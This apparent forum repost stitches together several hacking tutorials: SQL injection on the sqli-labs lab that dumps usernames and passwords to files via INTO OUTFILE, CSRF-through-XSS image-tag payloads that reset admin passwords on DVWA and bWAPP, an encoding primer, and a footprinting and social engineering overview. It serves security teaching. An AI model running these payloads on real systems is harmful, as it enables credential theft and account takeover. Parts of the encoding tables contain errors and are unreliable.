05-02-2020, 12:00 PM
| 0 | 0 | ||
This statement allows the user to load table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the significant rows to a file and gives authority to the use of column and row terminators to specify the output format. The output file is created directly by the MySQL server, so the filename with path should be specified where the user wants the file to be written on the server host. The file must not exist already on the server. It cannot be overwritten. A user requires the FILE privilege to run this statement.
Let’s start!!
Lesson 7
Open the browser and type following SQL query in URL
http://localhost:81/sqli/Less-7/?id=1
1
http://localhost:81/sqli/Less-7/?id=1
From the screenshot, you can read “you are in….. Use outfile” now let’s try to break this statement.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-p0h3DpQ_LJI/WVEtf1t1IHI/AAAAAAAAQSg/lP63kI1Hg902-n-8OKQPH_vabc4gMcAzwCLcBGAs/s1600/1.png?w=687&ssl=1)
OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.
http://localhost:81/sqli/Less-7/?id=1'
1
http://localhost:81/sqli/Less-7/?id=1'
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-TZ2tmI9dEBU/WVEtgnZ_aHI/AAAAAAAAQSw/Wy_RoHQ8cJYNLcNq8uxSiOErhjZD6e82gCLcBGAs/s1600/2.png?w=687&ssl=1)
After making lots of efforts finally successfully the query gets fixed if noticed the step for SQL injection is similar to the previous chapter only techniques to fix the query is different.
http://localhost:81/sqli/Less-7/?id=1')) --+
1
http://localhost:81/sqli/Less-7/?id=1')) --+
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-LmIShhCFnuA/WVEthfTlFqI/AAAAAAAAQS0/Ticprp8Q9j0-3rZxIqY02sRGClQJ1o0mgCEwYBhgL/s1600/3.png?w=687&ssl=1)
Now the following query will dump the result into a text file. Here you need to mention the path where the user wants the file to be written on the server host. The file must not exist already on server user always use a new text file for overwriting database information.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+
1
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+
From the screenshot, you can perceive that still it is showing error message now open another tab for the output of the resultant query.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-CcEZ87Gp0Ck/WVEthctCD4I/AAAAAAAAQS4/qEKCsbWO_oMuP53V52awqUz_zImgVtXhgCEwYBhgL/s1600/4.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/
1
http://localhost:81/sqli/Less-7/
Now add file name hack1.txt to check the output of the above query.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-N7PJkgXAbNA/WVEthrSwhmI/AAAAAAAAQS8/D67LsWak_RArtAYUBVoqR-LMw8q5OQuxACEwYBhgL/s1600/5.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack1.txt
1
http://localhost:81/sqli/Less-7/hack1.txt
hence you can see we get the output of executed query inside a text file. This will save the hack1.txt file inside the server machine also.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-C1I_MlSTUSQ/WVEth_OqvsI/AAAAAAAAQTA/bc9zfpUZH0Em8TNRdhOVM9l_RpRjiTZSACEwYBhgL/s1600/6.png?w=687&ssl=1)
Execute the following query to retrieve the database name using union injection using a new text file.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+
1
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tEc3sC4clTM/WVEtiMpiB0I/AAAAAAAAQTE/CWZuR7GvL8MzjFozpIxmK-bEXNAMAEA8wCEwYBhgL/s1600/7.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack2.txt
1
http://localhost:81/sqli/Less-7/hack2.txt
Hence you can see we have successfully get security as database name as result.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-PCnpGUKhf_w/WVEtiJn0SII/AAAAAAAAQTI/w31TkRDa7TcP-BPgJQ90Pw_ZoZwlvLfVwCEwYBhgL/s1600/8.png?w=687&ssl=1)
Next query will provide entire table names saved inside the database using another text file.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+
1
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-eqBwTEwYsuA/WVEtihWh0uI/AAAAAAAAQTM/Q7KVn9Cv0OYE3n-xVRtj3X2cwD4idXOtQCEwYBhgL/s1600/9.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack3.txt
1
http://localhost:81/sqli/Less-7/hack3.txt
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users
1
2
3
4
T1: emails
T2: referers
T3: uagents
T4: users
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-5oQtqDvmk-U/WVEwAEIBwNI/AAAAAAAAQTQ/4UTbN21D5Dw_vS4y32DubbctLhiyHzc_wCLcBGAs/s1600/10.png?w=687&ssl=1)
Now we’ll try to find out column names of users table using the following query.
localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+
1
localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-NwxpZkJnvXQ/WVEwNRCt6hI/AAAAAAAAQTc/PwoHsg8xwksn8KTdJxJIpoXDmL6MJT8igCLcBGAs/s1600/11.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack4.txt
1
http://localhost:81/sqli/Less-7/hack4.txt
Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.
C1: username
C2: password
1
2
C1: username
C2: password
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-wBYFFl9S0XI/WVEwNKGJa6I/AAAAAAAAQTU/XWkcbUUwrPIb-Lu41PeephGJdJhzSBh9QCEwYBhgL/s1600/12.png?w=687&ssl=1)
At last, execute the following query to read all username and password inside the table users from inside its column.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+
1
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YLgMfrCiVqQ/WVEwNZV-sQI/AAAAAAAAQTY/NNJxRRm4a2MMiuoIJvYjh_whIad_Hh73wCEwYBhgL/s1600/13.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack5.txt
1
http://localhost:81/sqli/Less-7/hack5.txt
From the screenshot, you can read the username and password save the inside text file.
Note: you can try the same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-xrOQSysWg9E/WVEwNisACwI/AAAAAAAAQTg/uH3OOwYtIaAa_ephnj9Hc0YjUIa0o70WwCEwYBhgL/s1600/14.png?w=687&ssl=1)
Hello friends! In our
[To see content please register here]
article, we saw how an attacker can shoot web application against CSRF vulnerability with help of burp suite. Today again we are going to test CSRF attack with help of XSS vulnerability.AS we know taking the help of XSS attacker might be able to read cookies from the same domain and if CSRF token is stored in cookies then the attacker will able to read the CSRF token from CSRF protected post.Let’s have a look at how an attacker can make CSRF attack for changing the password of admin account when the web application is suffering from cross-site scripting vulnerability. For this tutorial, I had used DVWA and set its security level low.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-6pZp91qy8hw/WU5HNl4NL3I/AAAAAAAAQRs/Fiha-99JDegC0EoOKfhYpd9qBaQv8bQWQCLcBGAs/s1600/1.png?w=687&ssl=1)
Suppose that you have found XSS vulnerability in any web application server. Here we are going to use javascript or HTML script which will make CSRF attack for changing the password of the admin account.
![[Image: 2.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-vRsnHfgyyvY/WU5HNk3jPYI/AAAAAAAAQRo/fLsCr0CUyOY9AVwDWB0hlaw_I4G8pVESACLcBGAs/s1600/2.1.png?w=687&ssl=1)
An XSS attack can be used to read the cookies and get the valid tokens if it is stored in cookies which have to be inserted in the malicious script to make CSRF possible. Using image tag we will send a malicious script, inside script I had set a new password like 123456.
<img src="/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">
1
<img src="/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-lmfD-NNwByo/WU5HN8swOrI/AAAAAAAAQRw/JA5K82EDRTMT1VsVqT7eetdZTQjEOhvVQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Now let’s check whether the password for admin has been changed or not, previously credential was admin: password, if the admin gets failed to login inside web server using his previous credential then we had successfully made CSRF attack.
From given screenshot, you can see using admin: password it confirms login failed. Now use your new password 123456 for login inside web server.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-_fYseFY9_As/WU5HOYTJGqI/AAAAAAAAQR0/a6wPxcMY1Fwxbq6iBLUFai6dOCLBEIhyACEwYBhgL/s1600/3.png?w=687&ssl=1)
Similarly, there is another web application bwapp where we will demonstrate the same attack using XSS vulnerability. First, you need to choose your bug “cross-site scripting Reflected (post)” and set security level low.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-e95uLi2m7g4/WU5HO3TaC9I/AAAAAAAAQR8/ozvELZq6VpcvDZl_ewEY_sQuXPLI-93MgCEwYBhgL/s1600/4.png?w=687&ssl=1)
In the given screenshot the form is suffering from XSS vulnerability now we are going to generate a script for making CSRF possible in order to change the password for a user. Here we are login as bee: bug into web server now we will try to change its password with help of cross-site scripting.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-LwUBz7EY6yQ/WU5HO1hqR1I/AAAAAAAAQR4/1ovGVvzBxHUjU6EaopxIsFXe9tEECfZcwCEwYBhgL/s1600/5.png?w=687&ssl=1)
Similarly using image tag we will send a malicious script, inside script I had set new password as hack.
<img src="/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change">
1
<img src="/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change">
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-HcG3zbMEk54/WU5HPsf6FOI/AAAAAAAAQSM/IMbs-EnwyiA-Cb-nserWrm-g3u__fPEZgCEwYBhgL/s1600/7.png?w=687&ssl=1)
From the screenshot, you can see generated image icon which means this form has XSS flaws now let check whether the password has been modified or not for user bee.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-kkaE8_iQb58/WU5HQHTuFhI/AAAAAAAAQSM/byIEdgMgS54hmiodqor-HOXs9B_8-Q9xwCEwYBhgL/s1600/8.png?w=687&ssl=1)
Now use previous credential bee: bug if login failed is confirmed it means we have successfully shot the CSRF attack and from the screenshot, you can see “invalid credential or user not activated” message. Now use a new password for login into a web server.
Conclusion: XSS vulnerabilities exist anywhere in the same domain it could lead to CSRF attack and allows attackers to remotely control the target’s browser with full rights, making CSRF useless.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-OrqwzmArH5U/WU5HQ21RvkI/AAAAAAAAQSM/MbDaPnNfvggAshOhwrMq7wZ8pfOQvWNzACEwYBhgL/s1600/9.png?w=687&ssl=1)
From Wikipedia
This article will describe the different type of process involves in encoding of data.
The term encoded data means wrapped data and the process of encoding is used to transform the data into a different format so that it can be easily understood by different type of system. For example ASCII characters are encoded by means of numbers ‘A’ is represented with 65, where as ‘B’ with 66 an so on.
As we known computer does not understand human languages therefore we need to encode the data into binary language which is easily readable by computer systems hence encoding is very important. It utilises such schemes that are widely available so that it can simply be reversed. Encoding means data transformation, not data encryption consequently it does not need a key in decoding.
URL Encoded
The internet only accepts URL’s in ASCII format, URL encoding entails encoding certain parts of the URL character set. This process takes one character and converts it into a character triplet that has a prefix of “%” followed by two digits in hexadecimal format.
Character
Encoded
:
%3A
/
%2F
#
%23
?
%3F
&
%24
@
%40
%
%25
+
%2B
<space>
%20
;
%3B
=
%3D
$
%26
,
%2C
<
%3C
>
%3E
^
%5E
`
%60
\
%5C
[
%5B
]
%5D
{
%7B
}
%7D
|
%7C
“
%22
Example :
Original URL:
[To see content please register here]
Encoded URL: http%3A%2F%2Fwww.hackingarticles.in
Hexadecimal
Hexadecimal or Base 16 is a positional number system which consists of 16 distinct symbols which range from 0 to 9 in numerals and both upper and lowercase alphabets which range from A to F which represent numeric values 10 to 15
Step 1 – is to get the decimal value of an alphabet, this is different for both upper and lower case, eg: A = 65 and a = 97. In order to find the value of any alphabet, we count down to it from ”A” or “a”, the values are in single digit succession, eg: A = 65 B = 66 C = 67 and so on / a = 97 b = 98 c = 99 and so on.
Step 2 – To convert from decimal to hexadecimal, take the decimal value and divide it by 16, the hex value will be written beginning from the quotient all the way up to the remainder. So, the hex value of 97 will be 61.
Eg:
16
97
1
6
6
Source
R
a
j
Decimal Value
82
97
106
Hexadecimal value
52
61
6a
Base64
Each base64 digit represents exactly 6 bits of data.Is a radix-64 representation of ASCII string, here’s how we get it?
Step 1 – is to get the decimal value of an alphabet, this is different for both upper and lower case, eg: A = 65 and a = 97. In order to find the value of any alphabet, we count down to it from”A” or “a”, the values are in single digit succession, eg: A = 65 B = 66 C = 67 and so on / a = 97 b = 98 c = 99 and so on.
Step 2 – is to divide the decimal value by 2, where ever there is a reminder it is denoted as “1” and where ever the remainder is “0”, it is denoted as “0”, continue to divide till you reach 0 or 1 and cannot divide any further. The binary value will be the denoted 1’s and 0’s counted from last to first.
Eg:In order to get a 8-bit value we prefix a “0” to the value, eg: 01010010 and this gives us the binary value of “a”.
2
97
1
2
48
0
2
24
0
2
12
0
2
6
0
2
3
1
1
1
Step 3 – Write the values of all the characters in binary and make pairs of 6 (6-bit), eg: binary value of “Raj” in 8-bit = 010100 100110 000101, binary value of “Raj” in 6-bit = 010100 100110 000101 101010.
Step 4 – Write the 6-bit decimal value of the pairs we make in Step 3 and adding all the values where we have 1’s
32
16
8
4
2
1
0
1
0
1
0
0
20
1
0
0
1
1
0
38
0
0
0
1
0
1
5
1
0
1
0
1
0
42
Step 5 – Use the Base64 table to lookup the values we get in Step 4.
The Base64 index table:
Value
Char
Value
Char
Value
Char
Value
Char
0
A
16
Q
32
g
48
w
1
B
17
R
33
h
49
x
2
C
18
S
34
i
50
y
3
D
19
T
35
j
51
z
4
E
20
U
36
k
52
0
5
F
21
V
37
l
53
1
6
G
22
W
38
m
54
2
7
H
23
X
39
n
55
3
8
I
24
Y
40
o
56
4
9
J
25
Z
41
p
57
5
10
K
26
a
42
q
58
6
11
L
27
b
43
r
59
7
12
M
28
c
44
s
60
8
13
N
29
d
45
t
61
9
14
O
30
e
46
u
62
+
15
P
31
f
47
v
63
/
The Base64 encoded value of Raj is UmFq. Encoded in ASCII, the characters R, a, and j are stored as decimal values 82, 97, and 106, their 8-bit binary values are 01010010, 01100001, and 01101010. These three values are joined together into a 24-bit string, producing 010100100110000101101010. Groups of 6 are converted into individual numbers from left to right. While converting from 8-bit to 6-bit, 0’s are added to fill the last slots, so that a full pair of 6 can be made.
The full conversion of “Raj” to Base64 is shown in Table 1.1 and the individual conversion of “R” and “Ra” of “Raj” are shown in Tables 1.1 and 1.2 to show a breakdown of the process with explanation
Raj 82 97 106 01010010 01100001 01101010
![[Image: 1.png?resize=687%2C265&ssl=1]](https://i1.wp.com/www.hackingarticles.in/wp-content/uploads/2017/06/1.png?resize=687%2C265&ssl=1)
In the Table 1.2, for character “R” of “Raj”, the values in the Bit patternsection are in 8-Bit format and they are being converted into 6-Bit and the decimal value of the 6-Bit pairs are in the Index section.Table 1.1
The same process is repeated in Table 1.3 for characters “R” and “a” of “Raj”.
For each pair of extra 0’s that are added to complete a pair of 6, an “=” is added for each pair, so the ACHII value of “0 0” is “=”.
![[Image: 2.png?resize=516%2C530&ssl=1]](https://i1.wp.com/www.hackingarticles.in/wp-content/uploads/2017/06/2.png?resize=516%2C530&ssl=1)
In table 1.4 to further build on the logic used in table 1.2 and 1.3, “Raaj” is converted to “UmFhag==” in Base64, with the addition of an additional “a”, the complexity of the conversion increases. In the Indexsection we can see an additon of 33, 26 and 32 due to the change in the bit pattern.
For each pair of extra 0’s that are added to complete a pair of 6, an “=” is added for each pair, so the ACHII value of “0 0” is “=”, as done in table 1.2 and 1.3.
![[Image: 3.png?resize=614%2C530&ssl=1]](https://i1.wp.com/www.hackingarticles.in/wp-content/uploads/2017/06/3.png?resize=614%2C530&ssl=1)
Rot13
This is a letter substitution cypher, it’s conversion process from plain text to cypher test is dicinging the total number of alphabets in half: A to M and N to Z. The first half mirriors the second half and vice versa. So, A = N and N = A.
Eg: Rot13 of Raj = Enw
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
There are many saying about knowing your enemy, time and time again these sayings have proved to be true. Today we hear all around the work of hackers and many-a-times we fail to protect ourselves. This happens because we are not familiar with their working process. Therefore, in this article, we are here to make to accustomed to the first step of the process i.e. Footprinting.
In the world of Cyber Security, Footprinting is the first step which lets penetration testers gather information about hardware or network. It is basically an exploration process which helps us to know our enemy. In order to complete the penetration process, one ought to gather as much information as possible. Footprinting can be done either actively or passively. Assessing a company’s website with their permission is an illustration of passive footprinting and trying to access sensitive information through social engineering is an illustration of active information gathering.
Types of Footprinting:
- Footprinting through Search Engine
- Footprinting through social engineering
- Footprinting through Social Networking sites
- Website Footprinting
- Competitive Intelligence
- WHOIS Footprinting
- Footprinting using advanced Google hacking techniques
- Email Footprinting
- DNS Footprinting
- Network Footprinting
Footprinting through Search Engine
Footprinting through the search engine is unambiguous in itself. People often wonder what one can find through the search engine as the common concept of the search engine is basic exploring. But results given by the search engine can be used to hacker’s advantage as they are vast in nature.
Attackers use search to gather information about their target such as technology platforms, employee details, login pages, intranet portals, etc. which helps in performing social engineering and/or other types of advanced system attacks.
Even search engine cache and internet archives may provide sensitive information that has been removed from the World Wide Web (WWW).
There are many search engines where you can find anything that desires from finding the meaning of the word to finding a person. Such search engines are:
[To see content please register here]
[To see content please register here]
[To see content please register here]
[To see content please register here]
Now let’s take the example of google.com. If I search “Raj Chandel” on Google, then it will give me every possible result associated with the said person.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-aM1ZWnSBe3c/WXD0gWvUROI/AAAAAAAAQjA/DhFRlznz3ps876AJW3nqIFqv1nIB4VrbgCLcBGAs/s1600/1.png?w=687&ssl=1)
Same will be the result from other search engines. But different search engines are often used for particular searches. As shown above, Google is good for general information. If you want to know which websites are hosted on a particular server then you can use the Bing search engine. To know an IP address of any website just ping the website as shown below :
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-SCbOVs5N_g8/WXD0gihtAGI/AAAAAAAAQjE/pYWKuOSXkzII6uYMP59WXYs-iQQx1czwwCLcBGAs/s1600/2.png?w=687&ssl=1)
Now, open bing.com and type the IP in the search tab and press enter.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-UPxZJwlzIAE/WXD0hJiuA-I/AAAAAAAAQjI/KSSz00Ek35IlG68Wacvo7lJCB-XxrrHWwCLcBGAs/s1600/3.png?w=687&ssl=1)
So like this, Bing can give you details about websites which are hosted in the same server
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-1IpXlQBb9Eo/WXD0hd3d4II/AAAAAAAAQjM/O_H8SpuoglwaIaNNFjZb-WUBoOrb_M43wCLcBGAs/s1600/4.png?w=687&ssl=1)
Another search engine is shodan.io, it helps to locate various open ports, vulnerable IP’s, and effected digital-ware all over the world. Open shodan.io in your browser and search for port or IP.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-HbL3N6Bol_8/WXD0hnZxxNI/AAAAAAAAQjQ/a9-EMILcjwU8CefFmQxl9bP0neiC1T1vQCLcBGAs/s1600/5.png?w=687&ssl=1)
For a detailed tutorial of shodan.io please follow this link:
[To see content please register here]
Footprinting through Jobs Seeking Sites
Similarly, you can collect an abundance of information through job sites. You can know about the company’s infrastructure details, employee’s profile, hardware information, software information. Some of such sites are:
[To see content please register here]
[To see content please register here]
[To see content please register here]
[To see content please register here]
[To see content please register here]
[To see content please register here]
[To see content please register here]
Footprinting through Alerts
There is also a feature of adding alerts. This feature gives you an alert if anything is changed in a particular website; given that you have added an alert to the said website. To do so, open google.com/alerts and type the name of the website that you wanted to alert about. And then click on create an alert.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-dWhtdYTL70c/WXD0hyvMXpI/AAAAAAAAQjU/ySHyOkBDmhQ19GS5lrTfpCA-UURiVgeawCLcBGAs/s1600/6.png?w=687&ssl=1)
And this way an alert will be created.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-XcAkqzxd4u0/WXD0iNk0n-I/AAAAAAAAQjY/-pZkvCHm8swun4HmFnmB8OPTqExtQ-SmgCLcBGAs/s1600/7.png?w=687&ssl=1)
Footprinting through Social Networking Sites
Attackers use social networking sites like Facebook, Twitter, and Pinterest etc. to gain important and sensitive data about their target. They often create fake profiles through these social media to lure their target and extract vulnerable information.
Employees may post personal information such as DOB, educational and employment background, spouse’s names, etc. and information about their company such as potential clients and business partners, trade secrets of business, websites, company’s upcoming news, mergers, acquisitions, etc.
Even the information about the employee’s interest is tracked and then they are trick into revealing more information.
Now if you want to search a particular person using just their name or email then there are specialized websites for it like pipl.com and lullar.com
Open pipl.com and type the name of the person you want to search about. For instance, I have searched my own name and as you can see in the image below we get a positive result.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-PjVi3d8x5O0/WXD0iiz-YBI/AAAAAAAAQjc/dZQ73y4MnWwSwOskmKI1jlJnsa34m2xZQCLcBGAs/s1600/8.png?w=687&ssl=1)
Now open lullar.com, here you can search for people using their email and much more. Here, I have searched through email (using my own email) and there is a positive result in the image below.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-oUGObVP3FwQ/WXD0iptIA1I/AAAAAAAAQjg/MGu80eSZluowhDgsMJ9dga9D6kArL57dACLcBGAs/s1600/9.png?w=687&ssl=1)
Footprinting through Social Engineering
Social engineering is an art of manipulating human behavior to our own advantage. This proves most helpful when the need for extraction of confidential information. To do so, we have to depend on the fact that people are unaware of their valuable information and have no idea about being exploited. The most common example for this is when people call as fake credit/debit card companies and try to extract information.
Techniques used for social engineering are:
Eavesdropping
Shoulder surfing
Dumpster diving
Impersonation on social networking sites
This is how footprinting is done through search engines, social networking sites and social engineering. As white hat hackers, we should know about it but we should also be aware try to protect ourselves from black hat hackers against footprinting.
